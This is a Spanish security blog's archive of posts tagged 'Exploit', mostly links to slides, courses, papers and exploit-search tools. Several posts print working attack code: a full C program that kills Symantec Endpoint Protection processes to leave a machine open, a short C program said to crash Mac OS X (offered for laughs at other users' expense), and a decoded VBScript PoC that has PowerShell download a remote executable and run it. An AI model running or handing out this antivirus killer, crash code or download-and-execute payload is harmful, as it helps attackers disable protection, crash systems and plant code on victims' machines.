Este blog ya no está activo, sigue informándote aquí:

Mostrando entradas con la etiqueta Exploit. Mostrar todas las entradas
Mostrando entradas con la etiqueta Exploit. Mostrar todas las entradas

martes, 3 de abril de 2018

Slides.- Building a 1-day Exploit for Google Chrome

Volvemos de vacaciones con las ideas un poco mas frescas, solo digo un poco ya que se me han pasado muy rápidas, pero me ha dado tiempo a verme todas las películas de Iron Man y vengo bastante motivado. 


Se que a muchos esta reflexión de tres lineas os las trae mas bien floja, pero últimamente y creo que se puede notar por mis entradas, estaba un poco desganado. Pero nada, a trabajar en nuevos proyectos e ideas locas. 

Así que, mientras trabajo para presentaros mis ideas, os comparto estas Slides tan molonas sobre como crear un exploit para una vulnerabilidad en Google Chrome. Muy didáctico todo. 

Sed Buenos ;) 

domingo, 22 de octubre de 2017

Metasploitable 2.- Explotación.

Hoy toca vídeo y si el otro día hablábamos sobre como buscar la información necesaria gracias a técnicas de fingerprinting, hoy a Kazukun le toca explotar la versión vulnerable de samba y hacernos con las contraseñas del servidor. 



Sed Buenos ;)

miércoles, 4 de octubre de 2017

PoC.- CVE & Exploit

Este es un script que programe hace tiempo como PoC  de como trabajan Python y Excel. Pero creo que tiene un poco mas de utilidad y pese a no ser un hobbytruco, puede que para un futuro me sirva. 


Se trata de un simple script que cogía un CVE, lo buscaba en Exploit Database y después hacia una tabla con los resultados encontrados. Todo muy molón y con pocas lineas de código hasta que pusieron el reCaptcha. 

Aquí tenéis el enlace al GitHub: 
Otra opción sería y la recomendada por Exploit Database es usar SearchSploit una herramienta que ya viene con las nuevas versiones de Kali Linux y que nos permite realizar cualquier búsqueda. 
Sed Buenos ;) 

lunes, 19 de junio de 2017

Herramienta.- Pwnbox

Los [contenedores Docker] se han venido para quedarse y cada vez me sorprende mas sus  aplicaciones. Por ejemplo [Harold Rodriguez] lo ha aplicado a algo que nos gusta a todos que son las CTFs (Capture The Flag),


Pues Pwnbox es un contenedor Docker que contiene varias herramientas para el reversing de binarios y para su explotación.  Una pasada pero un poco difícil de instalar, aunque en el GitHub encontrareis como hacerlo paso por paso. 

Enlace a la herramienta: 


Sed Bueno ;)

lunes, 6 de febrero de 2017

Exploit para CVE-2017-0016 el 0'day de Windows

El viernes por la noche se liberó la vulnerabilidad CVE-2017-0016 la cual, por un fallo al tratar adecuadamente las respuestas de un servidor que contengan demasiados bytes de un server SMB permite a un atacante remoto provocar una denegación de servicio. 


Mas información acerca de la vulnerabilidad: 

Es un problema que seguramente se resolverá en las actualizaciones periódicas de Windows de la semana que viene y que afecta a Windows 8.1, 10, Server 2012 y Server 2016. Pero, también se ha liberado una prueba de concepto mas que un exploit público, así que vamos a poder jugar mucho con él. Ademas esta hecho en Python así que nada mejor para aprender. 

Enlace a la prueba de concepto programada por Laurente:

Sed Buenos ;) 

miércoles, 1 de febrero de 2017

Dame un Exploit para el Kernel de Linux.

Existen miles de vulnerabilidades al año y por muy al día que estemos en este mundo, no creo, al menos yo, poder deciros de cabeza las 5 últimas vulnerabilidades con exploit público. Menos incluso si nos centramos solamente en Linux. 


Mariusz 'mzet' Ziulek ha "reprogramado" la herramienta linux-exploit-suggester un buscador de exploits que cuya idea principal fue de PenturaLabs en 2014. Marius lo ha modernizado y actualizado a 2017 con los nuevos exploits y vulnerabilidades. 

Muy útil y muy fácil de usar:
  • Usage: linux-exploit-suggester.sh [OPTIONS]
Enlace a la herramienta de Marius con muchísimas mas información y los puntos de mejora respecto a la versión de PenturaLabs:

lunes, 7 de noviembre de 2016

[Exploit].- Tumblr XSS

Hoy este exploit me ha parecido la mar curioso. Es un ejemplo de como al ver un fallo en un editor o en el mal funcionamiento de un servicio web y conseguir transformarlo en una vulnerabilidad.


Andrew Land,  usando solamente editor Markdown incorporado en Tumblr y un poco de conocimiento de JavaScript, ha conseguido ejecutar código JavaScript en un subdominio de un blog Tumblr. Lo mejor es que Tumblr ha dicho que es una característica de la página y no una vulnerabilidad, así que no lo piensa parchear. 

De esta manera aprovechad mientras podáis y no seáis muy malos: 

jueves, 3 de noviembre de 2016

[Exploit].- CVE-2016-6663 y CVE-2016-6664

Hoy se han publicado dos vulnerabilidades que afectan a MySQL y aunque no hablaré de que permiten si que han aparecido dos exploits públicos para ellas. Eso es lo mas divertido de todo. 


Las vulnerabilidades son la CVE-2016-6663, la CVE-2016-6664 y afectan a las siguientes versiones:
  • MySQL versión 5.5.51 y anteriores.
  • MySQL versión 5.6.32 y anteriores.
  • MySQL versión 5.7.14 y anteriores.
La gente de LegalHackers no solo se han currado una explicación genial sino es que dentro de cada una de estos análisis esta el código del exploit para poderlos estudiar y reproducir, realmente bien:

Fuente de la entrada y solución provisional a estas vulnerabilidades: 

Y bueno, también se publicará un vídeo cuando esta buena gente quiera, así que mas le podemos pedir:
Sed Buenos ;)

martes, 31 de mayo de 2016

OpenBSD.- Mitigación de tecnicas de Exploit

Esto es un secreto que llevo dentro desde que empecé a trastear con diferentes distribuciones de linux y Unix.  Hace ya mucho tiempo en el que llevaba una partición de Puppy Linux en mi mp3 por si tenia ganas de trastear con algún pc que se me pusiera a tiro pero de todas las distribuciones (grandes y pequeñas) siempre ha habido una que me ha parecido mágica y esa es OpenBSD.


Aunque desde que salio a la luz el tema de los [backdoors del FBI]  no he confiado mucho en ella. Pero supongo que ha día de hoy no los seguirá teniendo ¿no? ¿Alguien puede confírmamelo?

Pero bueno, si siguen sacando guías como la que os recomiendo sobre la mitigación de técnicas de exploit en este sistema puede que vuelva a recuperar parte de esa mágica que perdió para mi. 
En serio, leeros el paper que merece la pena y hay mucha información técnica sobre como impedir estas técnicas. 

Sed Buenos ;) 

viernes, 15 de abril de 2016

Paper.- Analisis de Neutrino Exploit Kit

Siempre mola analizar un Exploit kit a ver que nuevas vulnerabilidades contienen o para ver de que manera estaban dando caña a los usuario. Así que, encontrar un paper donde han diseccionado al Exploit Kit Neutriono casi paso a paso es normal que os lo recomiende.


"Estas amenazas no son nuevas y han existido durante los últimos 10 años. No obstante, han evolucionado y ahora son más sofisticados que nunca. Los autores de malware detrás de ellos utilizan diferentes técnicas para evadir su detención y frustrar así la obtención de evidencias. Este paper demuestra un conjunto de herramientas y técnicas para llevar a cabo el análisis de Neutrinos Exploit Kit. El objetivo principal es hacer crecer la experiencia y el conocimiento acerca de la seguridad este tipo de amenazas. Las personas habilitadas para defender a los usuarios y empresas, deben no sólo estudiar estas amenazas, sino que también debe estar profundamente involucrados en su análisis."

Enlace al paper:
Sed Buenos ;)

lunes, 21 de marzo de 2016

Curso.- Modern Binary Exploitation

Como yo el tema de la ingeniería inversa y la programación de exploits lo llevo bastante cojo, me he buscado un curso para poder aprender poco a poco esta semana santa y creo que a mas de un lector de este blog le va a ir bien repasar o aprender.


Este curso fue lanzado en la primavera de 2015 en [Rensselaer Polytechnic Institute] y es utilizado para enseñar a buscar vulnerabilidades (a mano), ingeniería inversa y explotación de binarios. Así que es bastante completo y creo que por fin podre sacarme la espina del reversing y la creación de exploits. 

Os dejo el enlace al curso y al material de este para que podáis hacer los ejercicios prácticos:
Sed Buenos y aprended mucho ;) 

viernes, 18 de marzo de 2016

Manual de Creación de Exploits

Hace día que os quería hablar sobre que era una vulnerabilidad y un exploit ya que viendo algunos vídeos random de youtube se me cayo el alma al suelo al ver que lo confundían.  Así que, si me dejáis, hago la aclaración y luego comparto con vosotros el manual en cuestión. 


Vulnerabilidad: Es la existencia de una debilidad, de un error de diseño o implementación, que puede provocar un evento no deseado o inesperado comprometiendo a seguridad del sistema.

Exploit: Es una manera definida de romper la seguridad de un sistema a través de una vulnerabilidad. 

Estas maneras definas suelen convertirse en scripts y por si queréis empezar a crear buestros propios exploits para "entrenar" os recomiendo el manual en PDF que DragonJar publicó en su blog hace ya bastante tiempo. 
Sed Buenos y aprended mas.

jueves, 1 de octubre de 2015

Como Explotar WinRAR 5.21 ¡Actualiza!

Ayer me llegó al correo una notificación de bugtraq donde la gente de RARLAB anunciaba que habían publicado una nueva vulnerabilidad en WinRAR. Si, la misma de la que os hablé en la entrada anterior. Bueno, la verdad es que me sorprendió ya que al ralo la vi publicada en [TheHackerNews] con el titulo de KILLER, empece a investigar un poco.
Ya hemos hablado un poco aquí [sobre Winrar y .zip] e incluso hemos explotado alguna vulnerabilidad en WinRAR 4.20 falsificando las extensiones.


Pero de la vulnerabilidad de la que os voy ha hablar hoy pasa mucho por un tema que me encanta que es el hecho de [bindear algo maligno para poder colarlo] en un auto-ejecutable SFX. 

Esta vulnerabilidad afecta a WinRAR 5.21 y permite la ejecución de código de forma remota a través de un HTML especialmente creado para tal fin y haciendo uso de la vulnerabilidad [CVE-2014-6332] / [MS15-064], la cual permite ejecución del código a través de Windows OLE. Mohammad Reza Espargham al encontrar la vulnerabilidad decidió gravarse el video y dejar una prueva de concepto (una PoC vamos) para todo aquel que quiera jugar un poco con la vulnerabilidad. 

Pero antes que dejaros el enlace a la PoC con las instrucciones para explotar la vulnerabilidad paso por paso. Os advierto que si descodificais el código ubicado en la variable my $poc= encontramos que automáticamente descarga un putty desde un servidor raro(no quiero ni saber si viene con bicho). 

Esto no es por que yo se muy listo sino por que en la PoC a bajo del todo lo pone:
  • $poc = decode_base64($poc);
Así que si lo "traducimos" encontramos lo siguiente: 
<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe','load.exe');$(New-Object -com Shell.Application).ShellExecute('load.exe');"
shell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0
end function 
</scrit>
Bueno, encontramos un html completo que se habria de modificar en caso de querer ejecutar otros tipos de funciones. Así que dicho esto,  os dejo el enlace y el vídeo para que podáis ver paso por paso como explotar esta vulnerabilidad. 

Enlace a la PoC :
Vídeo:


Quería haber grabado el vídeo yo igual que hice con el otro, pero me ha sido imposible.

Fuente:


Sed Buenos con esto 0;) 

jueves, 16 de julio de 2015

Exploit.- Deshabilitando Symantec EP 12.1.4013

Hace unos días me enviaron este exploit para que la analizara y la verdad es que me ha molado bastante.


Producida por John Page en diciembre del 2014 y reportada por symantec el día 20 de enero del 2015. Afecta la versión 12.1.4013 de Symantec Endpoint Protection y permite matar matar tanto al gente como a los servicios relacionados.

Por lo que, ahora "compliar" el exploit ejecutarlo y poder meter todo lo que queramos en esta máquina seria trivial si la victima no tiene un buen sistema de actualizaciones.

Aquí tenéis el exploit:  

#include <windows.h>
#include <Tlhelp32.h>
#define SMC_EXE "Smc.exe"
#define SMC_GUI "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"

/*
By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015

Goal:
Kill Symantec EP agent & services after globally locking down endpoint protection via the
Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS.

Scenario:
Run the from browser upon download or save to some directory and run
Not the most elegant code and I don't care...

*/

void el_crookedio_crosso(const char *victimo){
HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
PROCESSENTRY32 pEntry;
pEntry.dwSize=sizeof(pEntry);
BOOL hRes=Process32First(hSnapShot,&pEntry);

while(hRes){
if(strcmp(pEntry.szExeFile,victimo)==0){
HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID);
if (hProcess!=NULL){
TerminateProcess(hProcess,9);
CloseHandle(hProcess);
}
}
hRes=Process32Next(hSnapShot,&pEntry);
}
CloseHandle(hSnapShot);
}

DWORD exeo_de_pid(char *ghostofsin){
DWORD ret=0;
PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)};
HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hProcSnap==INVALID_HANDLE_VALUE) return 0;
if (Process32First (hProcSnap,&pe32))
do
if (!strcmp(pe32.szExeFile,ghostofsin)) {
ret=pe32.th32ProcessID;
break;
}
while (Process32Next (hProcSnap,&pe32));
CloseHandle (hProcSnap);
return ret;
}

void angelo_maliciouso(){
int AV=exeo_de_pid(SMC_EXE);
char id[8];
sprintf(id, "%d ", AV);
printf("%s", id);
char cmd[50]="Taskkill /F /PID ";
strcat(cmd, id);
system(cmd);

// system("Taskkill /F /IM Smc.exe"); //Access denied.
system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");

Sleep(1000);

el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);

}

int main(void){

puts("/*-----------------------------------------------------------*/\n"
);
puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013 |\n");
puts("| By hyp3rlinx - Jan 2015 |\n");
puts("/*------------------------------------------------------------*/\n
");

SetDebugPrivileges();
angelo_maliciouso();

Sleep(1000);

el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);

Sleep(2000);
angelo_maliciouso();

Sleep(6000);

return 0;
}

int SetDebugPrivileges(){
DWORD err=0;
TOKEN_PRIVILEGES Debug_Privileges;
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges
[0].Luid))return GetLastError();
HANDLE hToken=0;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken
)){
err=GetLastError();
if(hToken)CloseHandle(hToken);
return err;
}
Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
Debug_Privileges.PrivilegeCount=1;

if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){
err=GetLastError();
if(hToken) CloseHandle(hToken);
}
return err;
}

Fuente: 

lunes, 16 de marzo de 2015

Explotación remota del Dropbox SDK de Android.

Hoy haciendo el trabajo de cada día me he encontrado con la siguiente vulnerabilidad que, aparte de ser de un sistema de almacenamiento conocido como es Dropbox, de estar muy bien explicado y ser obra de gente de IBM, viene con vídeo, paper y exploit.


El problema radica en el mecanismo de autentiación del Dropbox SDK quedando vulnerables todas las aplicación que lo utilicen en las versiones que van de la 1.5.4 a 1.6.1. No hace falta decir que a partir de la versión 1.6.2 ya no es vulnerable. Esta vulnerabilidad permite  conectar aplicaciones de dispositivos móviles con una cuenta de Dropbox controlada por el atacante, sin el conocimiento o la autorización de la víctima.


Si tenéis mucha mas curiosidad os dejo aquí el white-paper con información mucho mas técnica y donde viene el exploit en la ultima página: 
Exploit: 


Fuente: 
Sed Buenos con esto 0;) 


sábado, 21 de febrero de 2015

Kernel Panic en Mac OS X Con Solo 10 lineas de Código

Ya que supongo que esta asumido que en los productos Apple también hay Malware, también os diré que Mac OS X también se pude colgar con muy pocas lineas de código. Ademas, escritas en C.


Estas son este es el código que nos permitirá hacernos unas risas con cualquiera que utilice un Mac Os X en cualquiera de las últimas versiones:

#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>

int
main (int argc, char * argv[])
{
  volatile char * library;
  const mach_vm_size_t page_size = getpagesize ();
  const mach_vm_size_t buffer_size = 3 * page_size;
  char buffer[buffer_size];
  mach_vm_size_t result_size;

  library = (char *) _dyld_get_image_header (1);
  mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);
  library[page_size]++;
  library[page_size]--;
  result_size = 0;
  mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);

  return 0;
}

Más Información sobre el script:

Sed Buenos con esto ;) 

viernes, 13 de febrero de 2015

Exploit Para CVE-2015-1574 DoS Para La App De Gmail En Android

La vulnerabilidad CVE-2015.1574 es bastante curiosa ya que afecta a la versión 4.2.2.0200 App de Gmail para Android. Aunque solo ha sido probada sobre un Samsung Galaxy 4 mini totalmente actualizado, esta vulnerabilidad provoca una denegación de servicio utilizando un correo especialmente creado. Ademas, es obra de [Hector Marco] y [Ismael Ripoll] de la Universitat Politècnica de València y el exploit esta escrito en Python, que mas puedo pedir.


Aquí tenéis el exploit por si le queréis echar un ojo: 
Si teneis mas curiosidad sobre la vulnerabilidad, el exploit y el bug que hace esto posible aquí os dejo el enlace a la web de los creadores: 
Sed Buenos con esto 0;) 

martes, 30 de diciembre de 2014

Anatomy of Exploit.- ¿Un Repaso?

En este blog hemos utilizado mucho el termino exploit y puede que sea uno de los términos mas usados en todos los demás blogs de seguridad informática junto al de vulnerabilidad. Así que, os voy a recomendar un paper que repasa muy bien que es un exploit y lo disecciona con un montón de detalles técnicos. Eso si esta en completo ingles. 


Aquí os dejo el paper: 
Para los que no sepas bien de que estoy hablando, el ingles no lo llevais del todo bien o simplemente queráis leer algo antes de meteros de lleno en todo un paper técnico os dejo, también, las entradas que he ido haciendo durante estos años referente al tema de los exploits.

Introducción a los exploits: 
Aquí si lo queréis en slides os ajunto el curso que impartí hará ya mas o menos medio año:

jueves, 11 de diciembre de 2014

Elevación de Privilegios en Windows 7 usando NTUserMessageCall

Hoy, como ya es algo habitual en mi día a día, he estado curioseando blogs y he encontrado una elevación de privilegios en Windows 7 usando la vulnerabilidad NTUserMessageCall.


Por la información que he podido encontrar sobre esta vulnerabilidad se trata de un desbordamiento en la  pool del kernel en Win32k permitiendo así una elevación de privilegios en local. Ademas, sabiendo que NTUser.dat es un archivo de registro de Windows. 

Bueno, en realidad es mas parecido a una base de datos que contiene la configuración de registro de su cuenta individual de un usuario del sistema. Así que el párrafo anterior tiene su lógica. 

Explicado todo esto, os dejo con un vídeo donde podéis ver la ejecución del exploit de esta vulnerabilidad. 

jueves, 27 de noviembre de 2014

Pompem Busca Tu Exploit Favorito (Si, #Python Otra vez xD)

Hace mucho que tenia esta herramienta en mi "carpeta para trabajar" y la verdad es que ya que la he tenido que rescatar por motivos personales, he decidido explicaros como funciona.

Pompem es una herramienta hecha por Relax Labs y escrita en Python para buscar exploits en las bases de datos mas conocidas, como por ejemplo: Exploit-db, 1337day, Packetstorm Security... Aunque, también tenéis una versión web escrita en PHP por si no tenéis una idea muy concreta. 

Versión web de Pompem

La web funciona como buscador, solo hace falta poner lo que queramos vulnerar y aparecerán los exploits correspondientes. Esta bien si quieres ir mirando de uno en uno pero, no nos agiliza nada el trabajo. 


La verdad es que la versión en Python es mucho mas divertida ya que podremos hacer una búsqueda y descargarnos todos los exploits referentes a esa búsqueda. Veamos un poco el Usage del script: 


Como veis no somos podemos hacer un get de exploit sino que podremos exportar la buesqueda en un txt o en un html para llevarnos trabajo a casa. Si hacemos un pompem.py -h obtendremos mas o menos la misma explicación que en el Usage. 


Si hacemos, por ejemplo, una búsqueda a exploits para Windows y los exportamos a html y a txt se nos creará un archivo out.html o out.txt respectivamente. 


Si abrimos el archivo .html:


Si abrimos el archivo .txt: 


A mi personalmente me gusta mas la versión en txt y encima ocupa menos. Pero tener un txt o html como log de búsquedas tampoco es una mala idea para llevar un seguimiento de las búsquedas que has hecho. 

Lo unico malo que le puedo sacar a este script es que tarda un poco en empezar a realizar ciertas acciones y la verdad es que, abriendo el codigo en la funcion maim. esta programado de una forma que se parece mucho a Javascript y no creo que sea sea la mejor forma de hacer un main. (Ojo tampoco es que yo sea un gran programado, solo digo que lo haria de otra manera.)

Me refiero a esto: 

La verdad es el único punto en el cual yo le podría sacar algo de puntilla pero no por esto, Pompem, deja de ser un script muy útil y bien programado. 

Para los que queras mas información os dejo el blog de uno de los creadores aquí:

Os podéis descargar la herramienta desde su repositorio en GitHub:
Sed Buenos con esto 0;)